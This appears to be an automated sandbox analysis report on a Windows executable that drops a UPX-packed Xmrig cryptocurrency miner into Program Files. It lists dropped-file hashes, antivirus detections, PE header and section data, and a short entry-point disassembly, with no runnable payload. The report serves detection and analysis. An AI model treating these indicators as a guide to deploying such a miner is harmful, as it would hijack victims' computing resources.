                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...s.)g...............&...... ................@..............................!....... ...`... ............................................... ....... ....... ...............!............................... .(...................D. ..............................text...............................`..`.data...............................@....rdata........ ......h .............@..@.pdata........ ......x .............@..@.xdata........ ....... .............@..@.bss....8..... ..........................idata........ ....... .............@....CRT....h..... ....... .............@....tls.......... ....... .............@....rsrc......... ....... .............@....reloc........!....... .............@..B........................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Preview:@...e...........................................................
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Preview:@...e...........................................................
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Program Files\xjfgcnhmcvxy.exe
                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1993216
                                                                                                            Entropy (8bit):7.937291620882887
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:49152:a0345NXqa1p8X7stbjkI8skQ0beZ5kxdxhngmN5lp32qIH+Du+9nL:a0o5NTrttEIj0aZ2xdxxgmzX3eUu+9
                                                                                                            MD5:16B93C72B9B6AE18C2A7B1C3330BF8BB
                                                                                                            SHA1:9B8478973757D18B6FC4D2873A82F4F8F7E6FED8
                                                                                                            SHA-256:84C56026C8C3177D0269B52883D4EEA3E6BEE3BDA03479E8FA39C739E6914B7D
                                                                                                            SHA-512:8C1669324D8B70A2911CC1833FCAD31A1394A068A328C0C03864DBF78034BD172E3DAC6685C9F37DA856993847349D6E0C6394C72C666C5ACB3025E254B70FA9
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\tkfgvduf.tmp, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......HJ...+..+..+..@..+..@..+..@..+..@..+.^^..+.^^..+.^^.n+.jD(..+..^..+..@..+..+..*..[._)..^..*..^..+..^*..+..+B..+..^..+.Rich.+.........PE..d...`.Vc.........."......`........`. '....`....@.............................@............`..................................................4..H....0........{.,............7..$............................)..(...X*..8...........................................UPX0......`.............................UPX1.....`....`..\..................@....rsrc........0.......`..............@......................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                            Entropy (8bit):7.959331419868799
                                                                                                            TrID:
                                                                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                            • DOS Executable Generic (2002/1) 12.50%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                            File name:ahlntQUj2t.exe
                                                                                                            File size:2'137'088 bytes
                                                                                                            MD5:934e9a3e294fa41c527fbd6dc867ddec
                                                                                                            SHA1:57edab4c313a7b3bf083a0c3364195b0491e00ba
                                                                                                            SHA256:75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9
                                                                                                            SHA512:3cf0955f0c17edb9f2dab98700f1a3d3d98e4a96da7a967eefc6d6151e37ad160bf6cf5549b6000ec3ea588b84e828c122005b8e3857e0297a763069746af4cc
                                                                                                            SSDEEP:49152:Z3LiNvWKaxZxeaOaUS15emjARtJGXVhwqbPcIt:ZbidWxeLEyyyGFhwqIY
                                                                                                            TLSH:4EA52306F3B263FDDA022E7D468F41E2A5DCA5900874E6110A0CD96FB736A9C6787F1D
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...s.)g...............&...... ................@..............................!....... ...`... ............................
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x1400014e0
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x140000000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                            Time Stamp:0x67291373 [Mon Nov 4 18:33:23 2024 UTC]
                                                                                                            TLS Callbacks:0x40005a80, 0x1, 0x40004de0, 0x1, 0x40004db0, 0x1
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:df9a7bc1c6c6cd97d04c3762fdde6719
                                                                                                            Instruction
                                                                                                            dec eax
                                                                                                            sub esp, 28h
                                                                                                            dec eax
                                                                                                            mov eax, dword ptr [002076A5h]
                                                                                                            mov dword ptr [eax], 00000001h
                                                                                                            call 00007F5D0086D9CFh
                                                                                                            nop
                                                                                                            nop
                                                                                                            dec eax
                                                                                                            add esp, 28h
                                                                                                            ret
                                                                                                            nop dword ptr [eax]
                                                                                                            dec eax
                                                                                                            sub esp, 28h
                                                                                                            dec eax
                                                                                                            mov eax, dword ptr [00207685h]
                                                                                                            mov dword ptr [eax], 00000000h
                                                                                                            call 00007F5D0086D9AFh
                                                                                                            nop
                                                                                                            nop
                                                                                                            dec eax
                                                                                                            add esp, 28h
                                                                                                            ret
                                                                                                            nop dword ptr [eax]
                                                                                                            dec eax
                                                                                                            sub esp, 28h
                                                                                                            call 00007F5D00877CCCh
                                                                                                            dec eax
                                                                                                            test eax, eax
                                                                                                            sete al
                                                                                                            movzx eax, al
                                                                                                            neg eax
                                                                                                            dec eax
                                                                                                            add esp, 28h
                                                                                                            ret
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            dec eax
                                                                                                            lea ecx, dword ptr [00000009h]
                                                                                                            jmp 00007F5D0086DD19h
                                                                                                            nop dword ptr [eax+00h]
                                                                                                            ret
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            nop
                                                                                                            inc ecx
                                                                                                            push esi
                                                                                                            inc ecx
                                                                                                            push ebp
                                                                                                            inc ecx
                                                                                                            push esp
                                                                                                            push ebp
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            push ebx
                                                                                                            dec eax
                                                                                                            sub esp, 00000260h
                                                                                                            dec eax
                                                                                                            mov edi, edx
                                                                                                            dec esp
                                                                                                            mov ebp, eax
                                                                                                            dec ebp
                                                                                                            mov esp, ecx
                                                                                                            call 00007F5D00870326h
                                                                                                            test al, al
                                                                                                            je 00007F5D0086DD57h
                                                                                                            dec eax
                                                                                                            add esp, 00000260h
                                                                                                            pop ebx
                                                                                                            pop esi
                                                                                                            pop edi
                                                                                                            pop ebp
                                                                                                            inc ecx
                                                                                                            pop esp
                                                                                                            inc ecx
                                                                                                            pop ebp
                                                                                                            inc ecx
                                                                                                            pop esi
                                                                                                            ret
                                                                                                            nop dword ptr [eax]
                                                                                                            dec esp
                                                                                                            lea esi, dword ptr [esp+50h]
                                                                                                            xor edx, edx
                                                                                                            inc ecx
                                                                                                            mov eax, 00000208h
                                                                                                            dec esp
                                                                                                            mov ecx, esi
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x20c0000x8f0.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x20f0000x388.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2090000x7d4.pdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2100000x8c.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x2083c00x28.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20c2440x208.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000xa8b80xaa007352e90b424cdbc0a892ff84dc3d188fFalse0.5723805147058824data6.272405024332568IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .data0xc0000x1fba000x1fba0018d15f6797f8dcc19fad4cfa46eb279eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rdata0x2080000xe800x10004e3bda6bac306452f3447c4f62b65d4fFalse0.477783203125data5.413762050124876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .pdata0x2090000x7d40x8006f1bbae6db677afac6f2fc795318291eFalse0.5029296875data4.522345011792639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .xdata0x20a0000x6b00x8006234b06253ac99b93d2312c274513500False0.2890625data3.7997482249396723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .bss0x20b0000xc380x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata0x20c0000x8f00xa005677bd7067e4f65c30204bfbf7ef3a81False0.32421875data3.9759001835655066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .CRT0x20d0000x680x2000de94c9b7374227854a5f1cd38f8be68False0.076171875data0.3536398094223054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .tls0x20e0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x20f0000x3880x400353e2bbcbc6fc647889a5a5998aee1efFalse0.451171875data5.01612475908362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
